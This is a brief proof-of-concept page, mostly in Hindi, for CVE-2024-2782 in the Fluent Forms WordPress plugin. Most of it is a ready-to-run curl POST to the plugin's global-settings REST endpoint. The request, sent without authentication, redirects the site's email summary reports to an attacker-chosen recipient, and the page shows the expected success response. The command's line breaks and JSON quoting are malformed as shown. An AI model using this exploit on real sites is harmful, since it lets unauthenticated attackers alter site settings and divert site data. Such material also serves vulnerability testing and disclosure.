
CVE-2024-2782 Proof-of-Concept
CVE-2024-2782 प्रूफ-ऑफ-कॉन्सेप्ट
वर्डप्रेस के लिए क्विज़, सर्वे और ड्रैग एंड ड्रॉप WP फॉर्म बिल्डर प्लगइन के लिए फ्लुएंट फॉर्म्स द्वारा कॉन्टैक्ट फॉर्म प्लगइन, /wp-json/fluentform/v1/global-settings REST API एंडपॉइंट पर क्षमता जांच की कमी के कारण डेटा में अनधिकृत संशोधन की चपेट में है, सभी संस्करणों में 5.1.16 तक और सहित। यह अप्रमाणित हमलावरों के लिए प्लगइन की सभी सेटिंग्स को संशोधित करना संभव बनाता है।
पूर्वापेक्षाएँ
एक्सप्लॉइट कमांड
curl -i -X POST "http://TARGET/wp-json/fluentform/v1/global-settings"
-H "Content-Type: application/json"
-d '{
"key": "emailSummarySettings",
"email_report": "{"send_to_type":"custom","custom_recipients":"[email protected]"}"
}'
अपेक्षित प्रतिक्रिया
HTTP/1.1 200 OK
Date: Thu, 31 Jul 2025 13:11:49 GMT
Server: Apache/2.4.62 (Debian)
X-Powered-By: PHP/8.3.11
X-Robots-Tag: noindex
Link: <http://target:9090/wp-json/>; rel="https://api.w.org/"
X-Content-Type-Options: nosniff
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link
Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private
Allow: POST
Content-Length: 4
Content-Type: application/json; charset=UTF-8
true
स्क्रीनशॉट

वर्डप्रेस डेटाबेस में परिवर्तन सत्यापित करें
